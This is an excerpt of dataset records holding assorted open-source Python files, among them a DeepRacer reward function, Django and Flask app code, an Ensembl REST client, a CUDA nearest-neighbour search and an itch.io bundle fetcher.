submit.place(x=150, y=260)\n\n canvas.pack()\n pageAdd.mainloop()\n\n\"\"\"\n ____ ____ ___ __ __ _____ ____ ____ ___ ____ _____\n | _ \\ | _ \\ |_ _| \\ \\ / / | ____| | _ \\ / ___| / _ \\ | _ \\ | ____|\n | | | | | |_) | | | \\ \\ / / | _| | |_) | | | | | | | | | | | | _|\n | |_| | | _ < | | \\ V / | |___ | _ < | |___ | |_| | | |_| | | |___\n |____/ |_| \\_\\ |___| \\_/ |_____| |_| \\_\\ \\____| \\___/ |____/ |_____|\n\n\"\"\"\nif sys.argv[2].lower()=='gui':\n homePage()\nelse:\n while True:\n nonGUI()\n","repo_name":"john-montgomery2003/bridging","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36231605371","text":"def reward_function(params):\n '''\n Example of rewarding the agent to follow center line\n '''\n\n # Read input parameters\n track_width = params['track_width']\n distance_from_center = params['distance_from_center'] - 0.2;\n steering = abs(params['steering_angle'])\n off_track = params['is_offtrack']\n is_reversed = params['is_reversed']\n left = params['is_left_of_center']\n speed = params['speed']\n\n marker_1 = 0.1 * track_width\n marker_2 = 0.25 * track_width\n # marker_3 = 0.5 * track_width\n\n # Give higher reward if the car is 
closer to center line and vice versa\n    if not left:\n        reward = 0.2\n    else:\n        if distance_from_center > marker_2:\n            reward = 1.25\n        elif distance_from_center > marker_1:\n            reward = 1.15\n        else:\n            reward = 1\n\n\n    if off_track:\n        reward = 1e-3\n\n    if is_reversed:\n        reward = 1e-3\n\n    # Steering penalty threshold, change the number based on your action space setting\n    ABS_STEERING_THRESHOLD = 15\n\n    # Penalize reward if the agent is steering too much\n    if steering > ABS_STEERING_THRESHOLD:\n        reward *= 0.8\n    if speed < 1.0:\n        reward *= 0.80\n    else:\n        reward += speed\n\n\n    return float(reward)\n","repo_name":"rvignav/DeepRacer2020","sub_path":"DeepRacer.py","file_name":"DeepRacer.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"22827259961","text":"from django.urls import path\nfrom django.contrib.auth.views import LoginView, LogoutView\n\nfrom .views import (register, home, update_todo, delete_todo, toggle_todo_status)\n\nurlpatterns = [\n    path(\"login/\", LoginView.as_view(template_name=\"todo/login.html\"), name=\"login\"),\n    path(\"logout/\", LogoutView.as_view(template_name=\"todo/logout.html\"), name=\"logout\"),\n    path(\"register/\", register, name=\"register\"),\n\n    path(\"\", home, name=\"home\"),\n\n    path(\"update/todo/<int:pk>/\", update_todo, name=\"update_todo\"),\n    path(\"complete/todo/<int:pk>/\", toggle_todo_status, name=\"toggle_todo_status\"),\n    path(\"delete/todo/<int:pk>/\", delete_todo, name=\"delete_todo\"),\n]","repo_name":"maxbratuta/todoapp","sub_path":"todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"23535052847","text":"import sys\nfrom subprocess import PIPE, Popen, STDOUT\n\nfrom .configuration import cfg\nfrom .tests import checkTests, testNames\nfrom .utils import notif, warn\n\n\ndef checkAgrumMemoryLeak(x, percent):\n  cmd = f'{sys.executable} act test debug -t {x} -m all'\n\n  first = cfg.C_VALUE + f\"[{percent:5.1f}%] \"\n  second = cfg.C_WARNING + x + cfg.C_END + \" : \"\n  flag = 0\n\n  sys.stdout.write(first + second)\n  sys.stdout.flush()\n\n  proc = Popen(cmd + \" --no-fun\", shell=True, stdout=PIPE, stderr=STDOUT)\n  out = proc.stdout.readlines()\n  for line in out:\n    if b\"NO MEMORY LEAK\" in line:\n      last = cfg.C_VALUE + \"ok\" + cfg.C_END\n      flag = 1\n    elif b\"Memory leaks found\" in line:\n      line = str(line)\n      last = cfg.C_ERROR + line.split(\"|\")[2].strip() + cfg.C_END\n      flag = 2\n\n  if flag == 0:\n    last = cfg.C_ERROR + \"?\" + cfg.C_END\n\n  print(last)\n  return (second + last, flag == 1)\n\n\ndef checkAgrumMemoryLeaks(current):\n  notif(\"Searching leaks test by test (may be a bit long).\\n\")\n\n  res = []\n  testslist = sorted(testNames(checkTests(current)))\n  for i, x in enumerate(testslist):\n    (msg, testOK) = checkAgrumMemoryLeak(x, (i + 1) * 100.0 / len(testslist))\n    if not testOK:\n      res.append(msg)\n\n  sres = \"\\n -\".join(res) if len(res) > 0 else cfg.C_VALUE + \"none\"\n  print(\"\\n\" + cfg.C_WARNING + f\"Test(s) with problem(s) :\\n -{sres}\\n\" + cfg.C_END)\n","repo_name":"agrumery/aGrUM","sub_path":"acttools/oneByOne.py","file_name":"oneByOne.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"34"}
{"seq_id":"72000506601","text":"# Given an array of integers, find the one that appears an odd number of times.\n
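# Example (illustrative): find_it([1, 1, 2]) returns 2, the only value with an odd count.\n# There will always be only one integer 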
that appears an odd number of times.\n\n\n\ndef find_it(seq):\n    for i in seq:\t\t# iterate through array\n    \tcount = 0\t\t\n    \tfor j in seq:\t# iterate through; if i == j, increase count\n    \t\tif i == j:\n    \t\t\tcount += 1\n    \tif count % 2 !=0:\t# if count returns odd num, return that num\n    \t\treturn i\n    return None\n    ","repo_name":"FrazierMark/code_wars_kata_a_day","sub_path":"find_the_odd_int (1-18-21).py","file_name":"find_the_odd_int (1-18-21).py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"30165141178","text":"from flask_bcrypt import Bcrypt\r\nfrom flask_login import LoginManager\r\nfrom flask_openid import OpenID\r\nfrom flask_principal import Principal, Permission, RoleNeed\r\n\r\nfrom flask_celery import Celery\r\nfrom flask_mail import Mail\r\n\r\nfrom flask_cache import Cache\r\n\r\nfrom flask_assets import Environment, Bundle\r\nfrom flask_admin import Admin\r\nfrom flask_restful import Api\r\n\r\n# Create the Flask-Bcrypt's instance\r\nbcrypt = Bcrypt()\r\n\r\n# Create the Flask-OpenID's instance\r\nopenid = OpenID()\r\n\r\n# Create the Flask-Login's instance\r\nlogin_manager = LoginManager()\r\n\r\n\r\nlogin_manager.login_view = \"main.login\"\r\nlogin_manager.session_protection = \"strong\"\r\nlogin_manager.login_message = \"Please login to access this page.\"\r\nlogin_manager.login_message_category = \"info\"\r\n\r\n# Create the Flask-Principal's instance\r\nprincipals = Principal()\r\n\r\n# Create the Flask-Celery-Helper's instance\r\nflask_celery = Celery()\r\n\r\n# Create the Flask-Mail's instance\r\nmail = Mail()\r\n\r\n#### Create the Flask-Cache's instance\r\ncache = Cache()\r\n\r\n#### Create the Flask-Admin's instance\r\nflask_admin = Admin()\r\n\r\n#### Create the Flask-Restful's instance\r\nrestful_api = Api()\r\n\r\n\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n    \"\"\"Load the user's info.\"\"\"\r\n\r\n    from .models import User\r\n    return User.query.filter_by(id=user_id).first()\r\n\r\n\r\n# Three kinds of permissions are defined here; they only take effect after being bound to an Identity.\r\n# Init the role permission via RoleNeed(Need).\r\nadmin_permission = Permission(RoleNeed('admin'))\r\nposter_permission = Permission(RoleNeed('poster'))\r\ndefault_permission = Permission(RoleNeed('default'))\r\n\r\n#### Create the Flask-Assets's instance\r\nassets_env = Environment()\r\n# Define the set for js and css file.\r\nmain_css = Bundle(\r\n    'css/bootstrap.css',\r\n    'css/bootstrap-theme.css',\r\n    filters='cssmin',\r\n    output='assets/css/common.css')\r\n\r\nmain_js = Bundle(\r\n    'js/bootstrap.js',\r\n    filters='jsmin',\r\n    output='assets/js/common.js')\r\n\r\n","repo_name":"qianqian0223/qianqian-blog","sub_path":"qianblog/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"42353455951","text":"from banco import db\nfrom datetime import datetime\n\n\nclass Proposta(db.Model):\n    __tablename__ = 'propostas'\n    id = db.Column(db.Integer, autoincrement=True, primary_key=True)\n    nome = db.Column(db.String(80), nullable=False)\n    desc = db.Column(db.String(120))\n    email = db.Column(db.String(80), nullable=False)\n    valor = db.Column(db.Float, nullable=False)\n    data_cad = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n\n    carro_id = db.Column(db.Integer, db.ForeignKey(\n        'carros.id'), nullable=False)\n\n    carros = db.relationship('Carro')\n\n    
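# Serialize this proposal into a plain dict for JSON responses\n    def 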
to_json(self):\n json_propostas = {\n 'id': self.id,\n 'nome': self.nome,\n 'email': self.email,\n 'desc': self.desc,\n 'valor': self.valor,\n 'carro_id': self.carro_id\n\n }\n return json_propostas\n\n @staticmethod\n def from_json(json_propostas):\n \n nome = json_propostas.get('nome')\n email = json_propostas.get('email')\n desc = json_propostas.get('desc')\n valor = json_propostas.get('valor')\n carro_id = json_propostas.get('carro_id')\n return Proposta(nome=nome, email=email, desc=desc, valor=valor, carro_id=carro_id)\n","repo_name":"robertopinho/Revenda","sub_path":"models/modelProposta.py","file_name":"modelProposta.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3580672891","text":"\"\"\"Packaging settings.\"\"\"\n\n\nfrom codecs import open\nimport os\nfrom os.path import abspath, dirname, join\nfrom subprocess import call\n\nfrom setuptools import Command, find_packages, setup\n\nfrom gitlabber import __version__\n\n\nthis_dir = abspath(dirname(__file__))\nwith open(join(this_dir, 'README.rst'), encoding='utf-8') as file:\n long_description = file.read()\n\n\nclass RunTests(Command):\n \"\"\"Run all tests.\"\"\"\n description = 'run tests'\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n \"\"\"Run all tests!\"\"\"\n errno = call(['py.test'])\n raise SystemExit(errno)\nsetup(\n python_requires='>=3',\n name = 'gitlabber',\n packages = ['gitlabber'],\n version = __version__,\n description = 'A Gitlab clone/pull utility for backing up or cloning Gitlab groups',\n long_description = long_description,\n url = 'https://github.com/ezbz/gitlabber',\n download_url = 'https://github.com/ezbz/gitlabber/archive/master.zip',\n author = 'Erez Mazor',\n author_email = 'erezmazor@gmail.com',\n license = 'MIT',\n keywords = ['gitlab', 'python', 'cli'], \n include_package_data = True,\n\n classifiers = [\n 'Development Status :: 4 - Beta', \n 'Intended Audience :: Developers',\n 'Topic :: Utilities',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3', \n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9'\n ],\n setup_requires = [\n 'docopt', \n 'anytree', \n 'globre',\n 'pyyaml',\n 'tqdm',\n 'GitPython', \n 'python-gitlab'\n ],\n install_requires = [\n 'docopt', \n 'anytree', \n 'globre', \n 'pyyaml',\n 'tqdm',\n 'GitPython', \n 'python-gitlab'\n ],\n tests_require= ['coverage', 'pytest', 'pytest-cov', 'pytest-integration'],\n entry_points = {\n 'console_scripts': [\n 'gitlabber=gitlabber.cli:main',\n ],\n },\n cmdclass = {'test': RunTests},\n)\n","repo_name":"ezbz/gitlabber","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":445,"dataset":"github-code","pt":"18"} +{"seq_id":"5412570964","text":"#!/usr/bin/env python\n\n# Python 3 compatible\n\nimport urllib.request\nimport urllib.parse\nimport urllib.error\n\nimport json\nimport time\nimport re\nimport sys\n\n\nclass EnsemblRestClient(object):\n def __init__(self, server='http://rest.ensembl.org/', reqs_per_sec=15):\n self.server = server\n self.reqs_per_sec = reqs_per_sec\n self.req_count = 0\n self.last_req = 0\n\n def perform_rest_action(self, endpoint, hdrs=None, params=None, doseq=0):\n if 
hdrs is None:\n            hdrs = {}\n\n        if 'Content-Type' not in hdrs:\n            hdrs['Content-Type'] = 'application/json'\n\n        if params:\n            endpoint += '?' + urllib.parse.urlencode(params, doseq)\n\n        data = None\n\n        # check if we need to rate limit ourselves\n        if self.req_count >= self.reqs_per_sec:\n            delta = time.time() - self.last_req\n            if delta < 1:\n                time.sleep(1 - delta)\n            self.last_req = time.time()\n            self.req_count = 0\n\n        try:\n            request = urllib.request.Request(self.server + endpoint, headers=hdrs)\n            response = urllib.request.urlopen(request)\n            content = response.read().decode('utf-8')\n\n            if content:\n                data = json.loads(content)\n            self.req_count += 1\n\n        except urllib.error.HTTPError as e:\n            # check if we are being rate limited by the server\n            if e.code == 429:\n                if 'Retry-After' in e.headers:\n                    retry = e.headers['Retry-After']\n                    time.sleep(float(retry) + 1.0)\n                    data = self.perform_rest_action(endpoint, hdrs)\n            else:\n                sys.stderr.write('Request failed for {0}: Status code: {1.code} Reason: {1.reason}\\n'.format(endpoint, e))\n\n        return data\n\n    def get_ensembl_id(self, species, symbol, only_stable_id=True):\n        \"\"\"\n        Return an Ensembl ID for the species gene symbol.\n\n        Parameters:\n        -----------\n        species - A species name, e.g., human\n        symbol - A gene symbol, e.g., BRAF\n        only_stable_id - If true returns only the first gene in the list of genes\n                         given by the server.\n                         else it will return the full JSON object.\n        \"\"\"\n\n        genes = self.perform_rest_action(\n            '/xrefs/symbol/{0}/{1}'.format(species, symbol),\n            params={'object_type': 'gene'}\n        )\n\n        if genes:\n            if only_stable_id:\n                stable_id = genes[0]['id']\n                return(stable_id)\n\n            return(genes)\n\n        return None\n\n    def get_variants(self, species, symbol):\n        stable_id = self.get_ensembl_id(species, symbol)\n\n        if stable_id:\n            variants = self.perform_rest_action(\n                '/overlap/id/{0}'.format(stable_id),\n                params={'feature': 'variation'}\n            )\n            return variants\n\n        return None\n\n    def get_ensembl_info(self, identifier, expand=False):\n        \"\"\"\n        Returns basic information on the given identifier.\n\n        Parameters:\n        -----------\n        identifier - Ensembl identifier, e.g., ENSE00001939332.\n        expand - Expands the search to include any connected features,\n                 e.g., if the object is a gene, its transcripts,\n                 translations and exons will be returned as well.\n        \"\"\"\n        if expand:\n            ext = \"/lookup/id/{0}?expand=1\".format(identifier)\n        else:\n            ext = \"/lookup/id/{0}?\".format(identifier)\n\n        info = self.perform_rest_action(ext)\n\n        if info:\n            return(info)\n\n        return(None)\n\n    def get_overlap(self, species='human', region='7:140424943-140624564', features=None):\n        \"\"\"Return the features overlapping the given region.\n\n        Parameters:\n        -----------\n        species - The organism whose genome is to be searched.\n        region - The region within the genome to search.\n        features - A list of features to retrieve. 
Multiple values are accepted.\n                   Enum(gene, transcript, cds, exon, repeat, simple, misc, variation,\n                   somatic_variation, structural_variation, somatic_structural_variation,\n                   constrained, regulatory, segmentation, motif, chipseq, array_probe).\n        \"\"\"\n        features = features or ['gene']\n        # Format the region into an appropriate format for query.\n        region = self.format_region(region)\n\n        info = self.perform_rest_action(\n            '/overlap/region/{0}/{1}'.format(species, region),\n            params={'feature': features},\n            doseq=1\n        )\n\n        if info:\n            return(info)\n\n        return(None)\n\n    @staticmethod\n    def format_region(region):\n        \"\"\"Return the region in the correct format for submission to Ensembl.\n\n        Parameters:\n        -----------\n        region - Either a coordinate string, chr7:123311-212131,\n                 or a list, ['7', '123311', '212131']\n\n        \"\"\"\n        try:\n            m = re.search(r'([XY]|[0-9]*):[0-9]*-[0-9]*', region)\n            return(m.group())\n        except TypeError:\n            return(region[0] + ':' + str(region[1]) + '-' + str(region[2]))\n\n\nif __name__ == '__main__':\n    if len(sys.argv) == 3:\n        species, symbol = sys.argv[1:]\n    else:\n        species, symbol = 'mouse', 'BRAF'\n\n    # Optional server\n    # client = EnsemblRestClient(server='http://grch37.rest.ensembl.org/')\n    client = EnsemblRestClient()\n\n    variants = client.get_variants(species, symbol)\n    if variants:\n        for v in variants:\n            print('{seq_region_name}:{start}-{end}:{strand} ==> {id} ({consequence_type})'.format(**v))\n        print()\n\n    genes = client.get_ensembl_id(species, symbol)\n    print(genes, end='\\n\\n')\n\n    
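# Note: the default region 7:140424943-140624564 queried below is the BRAF locus in GRCh37 coordinates\n    overlapping = client.get_overlap(species='human')\n    print(overlapping, end='\\n\\n')\n","repo_name":"okeeffdp/python_ensembl_rest_client","sub_path":"ensemblAPI.py","file_name":"ensemblAPI.py","file_ext":"py","file_size_in_byte":5993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
{"seq_id":"71427489640","text":"import numpy as np # linear algebra\n\nimport pandas as pd # data processing, CSV file I/O (e.g. 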
pd.read_csv)\n\nimport librosa\n\nimport matplotlib.pyplot as plt\n\nimport os\n\nimport cv2\n\nimport IPython.display as ipd\n\nfrom IPython.display import Audio, IFrame, display\n\nimport plotly.graph_objects as go\n\nimport librosa\n\nimport librosa.display\n\nplt.style.use(\"ggplot\")\n\ntrain = pd.read_csv(\"../input/birdsong-recognition/train.csv\")\n\nspecies=train.species.value_counts()\n\nfig = go.Figure(data=[\n\n    go.Bar(y=species.values, x=species.index,marker_color='deeppink')\n\n])\n\n\n\nfig.update_layout(title='Distribution of Bird Species')\n\nfig.show()\nfile_path='../input/birdsong-resampled-train-audio-04/wooscj2/XC67042.wav'\n\nx , sr = librosa.load(file_path)\n\nlibrosa.display.waveplot(x, sr=sr)\n\nAudio(x, rate=sr)\ndef noise(data, noise_factor):\n\n    noise = np.random.randn(len(data))\n\n    augmented_data = data + noise_factor * noise\n\n    # Cast back to same data type\n\n    augmented_data = augmented_data.astype(type(data[0]))\n\n    return augmented_data\nn=noise(x,0.01)\n\nlibrosa.display.waveplot(n, sr=sr)\ndef shifting_time(data, sampling_rate, shift_max, shift_direction):\n\n    shift = np.random.randint(sampling_rate * shift_max)\n\n    if shift_direction == 'right':\n\n        shift = -shift\n\n    elif shift_direction == 'both':\n\n        direction = np.random.randint(0, 2)\n\n        if direction == 1:\n\n            shift = -shift\n\n    augmented_data = np.roll(data, shift)\n\n    # Set to silence for heading/ tailing\n\n    if shift > 0:\n\n        augmented_data[:shift] = 0\n\n    else:\n\n        augmented_data[shift:] = 0\n\n    return augmented_data\ns=shifting_time(x,sr,1,'right')\n\nlibrosa.display.waveplot(s, sr=sr)\ndef speed(data, speed_factor):\n\n    return librosa.effects.time_stretch(data, speed_factor)\nv=speed(x,2)\n\nlibrosa.display.waveplot(v, sr=sr)\ndef pitch(data, sampling_rate, pitch_factor):\n\n    return librosa.effects.pitch_shift(data, sampling_rate, pitch_factor)\np=pitch(x,sr,2)\n\nlibrosa.display.waveplot(p, sr)","repo_name":"aorursy/new-nb-3","sub_path":"jainarindam_audio-augmentation-methods.py","file_name":"jainarindam_audio-augmentation-methods.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
{"seq_id":"27387885649","text":"from datetime import datetime\nfrom hurry.filesize import filesize\nfrom numba import cuda\nimport numpy as np\nimport pandas as pd\nimport os\n\nos.environ['CUDA_HOME'] = \"/opt/cuda/\"\n\nARCHIVE_REGISTER_THRESHOLD = 1000\nNEIGHBOURS_ARCHIVE_SIZE = 20\n\nSEARCH_SIZE = 200\n\nUPDATE_SUPPORT_NEIGHBOURS = 3\n\nCURRICULUM_SIZE = 1000\n\nrows = CURRICULUM_SIZE  # start with small number of records and increase at every level\nITERATIONS_PER_CURRICULUM_LEVEL = 10\n\n\n@cuda.jit\ndef neighbour_search_step(H, search_i, archive_i, archive_d, observed_mean_arr, rows_this_curr,\n                          curriculum_num, iteration_num):\n    x = cuda.grid(1)\n    # execute for each row\n    N = rows_this_curr[0]\n    if x >= N:\n        return\n    observed_count = 0\n    observed_sum = 0\n    for run in range(SEARCH_SIZE):\n        if run < (SEARCH_SIZE / 2):\n            search_index = search_i[x, run] % N\n        else:\n            other_row = (x + curriculum_num[0] * ITERATIONS_PER_CURRICULUM_LEVEL + iteration_num[0]) % N\n            search_index = search_i[other_row, run] % N\n        if search_index == x:\n            continue\n\n        dist = 0\n        for i in range(256):  # for all integer encodings of LSH bits\n            # xor to see flipped bits\n            var0 = H[x, i] ^ H[search_index, i]\n\n            # population count algorithm\n            var0 -= var0 >> 1 & 1431655765\n            var0 = (var0 & 858993459) + (var0 >> 2 & 858993459)\n            
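# remaining SWAR popcount steps: merge the nibble counts, then sum the bytes into the low 6 bits\n            var0 = var0 + 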
(var0 >> 4) & 252645135\n            var0 += var0 >> 8\n            var0 += var0 >> 16\n            dist += var0 & 63\n\n        observed_count += 1\n        observed_sum += dist\n\n        # find location to insert\n        FLAG_NOT_duplicate = True\n        insert_index = 0\n        while archive_d[x, insert_index] <= dist and insert_index < NEIGHBOURS_ARCHIVE_SIZE:\n            if archive_i[x, insert_index] == search_index:\n                FLAG_NOT_duplicate = False\n                break\n            insert_index += 1\n\n        if insert_index < NEIGHBOURS_ARCHIVE_SIZE and FLAG_NOT_duplicate:\n            if archive_i[x, insert_index] == -1:\n                # add in an empty space\n                archive_i[x, insert_index] = search_index\n                archive_d[x, insert_index] = dist\n            else:\n                # insert item and move other items right\n                temp_i_1, temp_d_1 = archive_i[x, insert_index], archive_d[x, insert_index]\n                archive_i[x, insert_index] = search_index\n                archive_d[x, insert_index] = dist\n\n                itr = insert_index + 1\n                while itr < NEIGHBOURS_ARCHIVE_SIZE:\n                    temp_i_2, temp_d_2 = archive_i[x, itr], archive_d[x, itr]\n                    archive_i[x, itr] = temp_i_1\n                    archive_d[x, itr] = temp_d_1\n                    temp_i_1, temp_d_1 = temp_i_2, temp_d_2\n                    itr += 1\n\n    observed_mean_arr[x] = observed_sum / observed_count\n\n\n@cuda.jit()\ndef update_step(search_i, archive_i, rows_this_curr):\n    \"\"\"\n    Update step where each point looks at its closest neighbours' archives and adds them to its own search array.\n    The search array of any point can have duplicate entries, but the neighbour search makes sure duplicates are not added to the archive.\n    \"\"\"\n    x = cuda.grid(1)\n    # execute for each row\n    if x >= rows_this_curr[0]:\n        return\n    update_window = int(SEARCH_SIZE / 2 / UPDATE_SUPPORT_NEIGHBOURS)\n\n    for i in range(UPDATE_SUPPORT_NEIGHBOURS):\n        close_neighbour = archive_i[x, i]\n        for j in range(update_window):\n            archive_item_to_search = archive_i[close_neighbour, j]\n            search_i[x, int(i * update_window + j)] = archive_item_to_search\n\n\nclass ApproxNearestNeighboursCUDA:\n\n    def calc_quality_metrics(self, archive_d_qual, observed_mean_arr_qual, rows_, rows_curr_gpu):\n        blocks_per_grid_quality = min([rows_, 1000])\n        threads_per_block_quality = int(rows_ / blocks_per_grid_quality) + 1\n        quality_sum = cuda.to_device(np.zeros(shape=rows_, dtype=np.int32))\n\n        @cuda.jit\n        def quality_sum_kernel(archive_d, qual_sum, rows_this_curr):\n            x = cuda.grid(1)\n            # execute for each row\n            if x >= rows_this_curr[0]:\n                return\n            sum_ = 0\n            for i in range(int(NEIGHBOURS_ARCHIVE_SIZE / 2)):\n                sum_ += archive_d[x, i]\n            qual_sum[x] = sum_\n\n        quality_sum_kernel[blocks_per_grid_quality, threads_per_block_quality](archive_d_qual, quality_sum,\n                                                                               rows_curr_gpu)\n        cuda.synchronize()\n        quality_sum = quality_sum.copy_to_host()\n\n        observed_means = observed_mean_arr_qual.copy_to_host()[0:rows_]\n\n        return np.mean(quality_sum), np.std(quality_sum), np.mean(observed_means), np.std(observed_means)\n\n    def get_observed_dist(self, ):\n        # TODO\n        pass\n\n    def run(self, df: pd.DataFrame, features_column: str, verbose: bool = True):\n        stats = []\n        ROWS_MAX = df.shape[0]\n        CURRICULUM_LEVELS = int(ROWS_MAX / CURRICULUM_SIZE)\n        if ROWS_MAX % CURRICULUM_SIZE != 0:\n            CURRICULUM_LEVELS += 1\n        A = np.array(df[features_column].values.tolist(), dtype=np.int32)\n\n        A_gpu = cuda.to_device(A)\n        if verbose: print(f\"A_gpu.alloc_size = {A_gpu.alloc_size}\")\n\n        archive_index = cuda.to_device(np.ones(shape=(ROWS_MAX, NEIGHBOURS_ARCHIVE_SIZE), dtype=np.uint32) * -1)\n        if verbose: print(f\"archive_index.alloc_size = {filesize.size(archive_index.alloc_size)}\")\n\n        
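# distances start at the uint16 maximum so any real neighbour distance will displace them\n        archive_dist = cuda.to_device(\n            np.ones(shape=(ROWS_MAX, NEIGHBOURS_ARCHIVE_SIZE), dtype=np.uint16) * 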
np.iinfo(np.uint16).max)\n if verbose: print(f\"archive_dist.alloc_size = {filesize.size(archive_dist.alloc_size)}\")\n\n search_matrix_index = cuda.to_device(\n np.random.randint(low=0, high=np.iinfo(np.int32).max, size=(ROWS_MAX, SEARCH_SIZE), dtype=np.uint32))\n if verbose: print(f\"search_matrix_index.alloc_size = {filesize.size(search_matrix_index.alloc_size)}\")\n\n observed_means_arr = cuda.to_device(\n np.empty(shape=(ROWS_MAX), dtype=np.float32))\n if verbose: print(f\"observed_means_arr.alloc_size = {filesize.size(observed_means_arr.alloc_size)}\")\n\n FLAG_tempering = False\n for curriculum_level in range(CURRICULUM_LEVELS):\n if verbose: print(f\"CURRICULUM_LEVEL = {curriculum_level + 1}/{CURRICULUM_LEVELS}\")\n rows = int(CURRICULUM_SIZE * (curriculum_level + 1))\n if rows >= ROWS_MAX:\n rows = ROWS_MAX\n FLAG_tempering = True\n\n if verbose: print(f\"number of rows (recordings) = {rows}\")\n\n curriculum_level_gpu = cuda.to_device(np.array([curriculum_level], dtype=np.int32))\n rows_gpu = cuda.to_device(np.array([rows], dtype=np.int32))\n\n blocks_per_grid = min([int(rows / 10), 50000])\n threads_per_block = int(rows / blocks_per_grid) + 1\n\n with cuda.defer_cleanup():\n # iterations of the Search and Update steps\n iterations_this_round = ITERATIONS_PER_CURRICULUM_LEVEL\n if FLAG_tempering:\n iterations_this_round = int(ITERATIONS_PER_CURRICULUM_LEVEL * 5)\n\n for iteration in range(iterations_this_round):\n iteration_gpu = cuda.to_device(np.array([iteration], dtype=np.int32))\n # neighbour search\n neighbour_search_step[blocks_per_grid, threads_per_block](\n A_gpu, search_matrix_index, archive_index, archive_dist, observed_means_arr,\n rows_gpu, curriculum_level_gpu, iteration_gpu)\n\n # Wait for GPU to complete\n cuda.synchronize()\n\n # update search direction based on archive: sees archive_index and updates search_matrix_index\n update_step[blocks_per_grid, threads_per_block](search_matrix_index, archive_index, rows_gpu)\n\n # print(search_matrix_index.copy_to_host()[200000, :])\n\n # Evaluate Solution Quality: sees archive_dist and updates search_i\n quality_mean, quality_std, obs_mean, obs_std = self.calc_quality_metrics(archive_dist,\n observed_means_arr,\n rows,\n rows_gpu)\n if verbose: print(f\"quality indicator: mean={quality_mean}\\tstd={quality_std}\\t|\\t \"\n f\"observed: mean={obs_mean}\\tstd={obs_std}\")\n\n stats.append(\n [datetime.now(), curriculum_level, iteration, rows, quality_mean, quality_std, obs_mean,\n obs_std])\n\n # wait for all computations to complete\n cuda.synchronize()\n\n df['row_id'] = np.arange(df.shape[0]).astype(np.int32)\n df['neighbours'] = [x for x in\n archive_index.copy_to_host().astype(np.int32)[:, 0:int(NEIGHBOURS_ARCHIVE_SIZE / 2)]]\n df['neighbour_dist'] = [x for x in\n archive_dist.copy_to_host().astype(np.int32)[:, 0:int(NEIGHBOURS_ARCHIVE_SIZE / 2)]]\n stats_df = pd.DataFrame(data=stats, columns=['timestamp', 'curriculum_level', 'iteration', 'rows',\n 'quality_indicator_mean', 'quality_indicator_std',\n 'observed_mean', 'observed_std'])\n return df, stats_df\n","repo_name":"sharwinbobde/MLHD-insights","sub_path":"python-code/src/AcousticBrainz/ApproxNearestNeighboursCUDA.py","file_name":"ApproxNearestNeighboursCUDA.py","file_ext":"py","file_size_in_byte":9841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14144829966","text":"import logging\nimport re\n\nimport requests as requests\nfrom easygui import enterbox\n\nfrom bundleinfo import BundleInfo\n\n\nclass 
ItchIoBundleGetter:\n class InvalidItchIoBundleException(Exception):\n pass\n\n def __init__(self):\n self.logger = logging.getLogger(__name__)\n\n def get_bundle(self) -> BundleInfo:\n url_or_id = enterbox('Please enter Itch.io bundle URL or ID:')\n pattern = re.compile(r'^https://itch\\.io/b/(\\d+)/.*$|^(\\d+)$')\n match = pattern.match(url_or_id)\n if not match:\n self.logger.error('Provided Itch.io bundle URL or ID is invalid!')\n raise self.InvalidItchIoBundleException()\n id = next(obj for obj in match.groups() if obj)\n\n self.logger.info('Retrieving bundle information from Itch.io')\n response = requests.get(f'https://itch.io/bundle/{id}/games.json')\n if response.status_code != 200:\n self.logger.error('Could not retrieve Itch.io bundle information!')\n raise self.InvalidItchIoBundleException()\n\n json = response.json()\n return self.convert(id, json)\n\n @staticmethod\n def convert(id, json) -> BundleInfo:\n games = json['games']\n bundle_info = BundleInfo()\n bundle_info.bundle_id = id\n for game in games:\n game_info = BundleInfo.GameInfo()\n game_info.name = game['title']\n bundle_info.games.append(game_info)\n return bundle_info\n","repo_name":"donthub/itch-io-steam-bundle-info","sub_path":"itchiobundlegetter.py","file_name":"itchiobundlegetter.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23307074949","text":"import falcon\nfrom falcon import testing\nimport json\nimport pytest\nfrom hipchat.api import api\n\n@pytest.fixture\ndef client():\n return testing.TestClient(api)\n\ndef test_links(client):\n params = {\"input\": \"Have you ever visited http://atlassian.com and http://google.com.ua\"}\n doc = {\n \"links\": [ { \"url\": \"http://atlassian.com\", \"title\": \"Atlassian | Software Development and Collaboration Tools\"}, \n\t {\"url\": \"http://google.com.ua\", \"title\": 